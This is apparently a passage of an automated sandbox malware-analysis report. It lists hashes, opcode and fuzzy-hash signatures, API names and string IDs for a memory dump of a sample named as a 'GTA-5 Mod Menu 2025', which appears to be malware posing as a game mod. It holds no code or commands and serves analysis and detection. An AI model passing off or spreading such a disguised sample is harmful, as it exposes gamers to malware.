                                                                    • Instruction Fuzzy Hash: 315134755007018BC3258F29C4A17B3B7B1FF5A310F18818ED4D64BBA2E739E881CB98
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1cd8c508e78ef8073936080974b298522d299879a719c0cc41071e3bc5569b2
                                                                    • Instruction ID: 42c5ab64a542005fbadb5cb2da5a8674fc7a5f5531ea7fdb17922c9c334201ec
                                                                    • Opcode Fuzzy Hash: e1cd8c508e78ef8073936080974b298522d299879a719c0cc41071e3bc5569b2
                                                                    • Instruction Fuzzy Hash: C2411632B0827147CB188E2D8D9417BBAE39FC5204B0EC63AFCC9AB7D6D578990197D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc4cc6d0190656e37b601dcc602b4663c53fa38f0bd0f9eea54efa4c519c4021
                                                                    • Instruction ID: f82c5a14085aa5c61eda4fbeacae995022f8bb6d82535ab9dd7600a61711b1f6
                                                                    • Opcode Fuzzy Hash: bc4cc6d0190656e37b601dcc602b4663c53fa38f0bd0f9eea54efa4c519c4021
                                                                    • Instruction Fuzzy Hash: B31178345046818FE7328F29D0503B2BFE2EF57315F2880DAC4D25BB82C2399886CB5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8e66c2541647b8e62543e7f1797b5a8a6feffc91e0f52eabb29bb2806c92e489
                                                                    • Instruction ID: d838456b58017227ce043a87e1cc4ae84cc8ff7af8bbaabd92724fd3cbd6d722
                                                                    • Opcode Fuzzy Hash: 8e66c2541647b8e62543e7f1797b5a8a6feffc91e0f52eabb29bb2806c92e489
                                                                    • Instruction Fuzzy Hash: BE2128769046408BDB29CF35C8917B2BBA3EBA7310F1C856DD493D7396CB74A8068768
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                    • Instruction ID: ec954f8137e4d140e6d4d376c15eee84be3ad36931f72bfd3336b2688414e86c
                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                    • Instruction Fuzzy Hash: 9611E933A091E50EC3168D3C84005A5BFA31AE7235F5D539AF4B49B2D2D6269D8A8359
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a35dbff6289815ffe861220c0bc0fbe87ba5018cf6d46c699ce90841ad03b4e
                                                                    • Instruction ID: c4cccad24f1be5721159f81bddb74e56e1ae0f04c305007aed06d0106061f318
                                                                    • Opcode Fuzzy Hash: 5a35dbff6289815ffe861220c0bc0fbe87ba5018cf6d46c699ce90841ad03b4e
                                                                    • Instruction Fuzzy Hash: 2C01B5F5B0031187DB20DE51A8C0727B2A95F90708F59043ED40857381DB79FC05C29A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08ac9a234e31864cf5ea3c432b4305e24f7799c5fa33f59c8c4bbeb283ceb5fd
                                                                    • Instruction ID: 5c0740542d5a7d4cfd3105530cb8cc8e37dbcec940ab5f4ba463d89588c03cb0
                                                                    • Opcode Fuzzy Hash: 08ac9a234e31864cf5ea3c432b4305e24f7799c5fa33f59c8c4bbeb283ceb5fd
                                                                    • Instruction Fuzzy Hash: D8114970510A408FD765CF29D4A07A2BBF0FB4B318F54995DC0D6C7692C739E886CB58
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bc3f33579ba0a43ff606aebe652e4752b6dfc56651d9f35aac2ee44f655e06c
                                                                    • Instruction ID: de49addb4ddbcc45936637b2f08cc7901b37445ce009f58ede38f9ee4367339e
                                                                    • Opcode Fuzzy Hash: 2bc3f33579ba0a43ff606aebe652e4752b6dfc56651d9f35aac2ee44f655e06c
                                                                    • Instruction Fuzzy Hash: EAF0283060C5404BE7168B34D451BF7FBE0A7AB704F186C7DC5C5D3243E62CA452460E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b11d23989305ef28c477e68356199a5a4452dc29e0fb07f479c7f0d70bdb8f3
                                                                    • Instruction ID: 33907db06b75b1cde1331380306e8094a8dd4b17d32d02a3482ed15d277e0220
                                                                    • Opcode Fuzzy Hash: 1b11d23989305ef28c477e68356199a5a4452dc29e0fb07f479c7f0d70bdb8f3
                                                                    • Instruction Fuzzy Hash: 45C0923CA58001C7CA08CF85F862A30A338B797209B25703ACA03E7292C528E8129A1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b80b9228edefec5c96295172a6f3e822064c2709ade7faf3deb89cfadb206b96
                                                                    • Instruction ID: 41de8a278b4918965351cc5c522e9341100c5c52662d57341aaec06ba183f624
                                                                    • Opcode Fuzzy Hash: b80b9228edefec5c96295172a6f3e822064c2709ade7faf3deb89cfadb206b96
                                                                    • Instruction Fuzzy Hash: CAC04878A4C001CBCB08CF08F8A2630B3B8BB9B209B16342D9986E3251C62898018A1D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: $!$"$$$&$($*$,$.$>$P$R$T$V
                                                                    • API String ID: 2610073882-1201524646
                                                                    • Opcode ID: 06a6cceae169c134fcbded70663d9c0f3f4a0c3da90b1809db870c66d63c28bc
                                                                    • Instruction ID: e0c1a9893a19edd6d9587a119b8eb553071a514b2989ddf97aa59854fb5ded9d
                                                                    • Opcode Fuzzy Hash: 06a6cceae169c134fcbded70663d9c0f3f4a0c3da90b1809db870c66d63c28bc
                                                                    • Instruction Fuzzy Hash: 5641262550C7C18ED331CB38994979BBFD1ABD6214F088AADD4ED8B292DA754005CB63
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AllocString
                                                                    • String ID: 0$A$B$C$M$O
                                                                    • API String ID: 2525500382-2716710918
                                                                    • Opcode ID: ae69a02d88fb99d840e05068d38587f89b583c02ccf9d9729b4959b3f09a708a
                                                                    • Instruction ID: 74cababeb73acfd0e47c95d23968434f1a7cf6f31bfd3aa6325757e7800ce56c
                                                                    • Opcode Fuzzy Hash: ae69a02d88fb99d840e05068d38587f89b583c02ccf9d9729b4959b3f09a708a
                                                                    • Instruction Fuzzy Hash: FF817E2410DBC28DD2329B7C4848B8BBF916BA7234F484B9EE1F95B2E2D3744146C767
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant
                                                                    • String ID: )$+$/
                                                                    • API String ID: 1927566239-1266874367
                                                                    • Opcode ID: f2b24d567103f6d6a8e3c0ca5909584bc52282501cbefaba848369dabea96a0a
                                                                    • Instruction ID: 8e2c71c5bbafb8921c33810cfcee233a57ef7bcd092fd80acd7cd5f70142a860
                                                                    • Opcode Fuzzy Hash: f2b24d567103f6d6a8e3c0ca5909584bc52282501cbefaba848369dabea96a0a
                                                                    • Instruction Fuzzy Hash: 3251287150C7C18ED331DB38845838ABFD06B96324F188A9DE5E4873E2C7788545CB53
                                                                    APIs
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423321
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004233A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID: 6B
                                                                    • API String ID: 237503144-4127139157
                                                                    • Opcode ID: 239428adc5e95068f59c9505de3eb8bb242fc1c453d03ff40821e59bfc4ae666
                                                                    • Instruction ID: 07153cc709a0abca34db5d3603b05a66cdb020eb2d3d13012d77569f380638af
                                                                    • Opcode Fuzzy Hash: 239428adc5e95068f59c9505de3eb8bb242fc1c453d03ff40821e59bfc4ae666
                                                                    • Instruction Fuzzy Hash: 15314676608360CFD324CFA5AC8071BBBA5EBC2705F05863DE9A05B2C1DBB99905C797
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 4116985748-3916222277
                                                                    • Opcode ID: 9045fd9fa8d0c70cafa05d7f2bc41b2ab8496edb7b7f8f5427a3d37f8d15449c
                                                                    • Instruction ID: e8ead997fea66f15498052154a86a76d15b965c9a51d8cd95930c0503aa07ab7
                                                                    • Opcode Fuzzy Hash: 9045fd9fa8d0c70cafa05d7f2bc41b2ab8496edb7b7f8f5427a3d37f8d15449c
                                                                    • Instruction Fuzzy Hash: 773161B49143148FDB00EF68DA8561EBBF4BB89304F51452EE498DB360D3B4A948CF96
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: #v
                                                                    • API String ID: 3664257935-554117064
                                                                    • Opcode ID: 3450f6972a44e0571a32aa1bb34743e8d31d7f597a8285ea3a337249caf4c94f
                                                                    • Instruction ID: 0da43da3f1c234e19d4c9429b1383541449f346d57cfa533a364a4621aeb1ed0
                                                                    • Opcode Fuzzy Hash: 3450f6972a44e0571a32aa1bb34743e8d31d7f597a8285ea3a337249caf4c94f
                                                                    • Instruction Fuzzy Hash: 3CC0027A902405EFDF026F62FE0E81A3A25FB9B30670408B5A906944B6DB634D20BB1D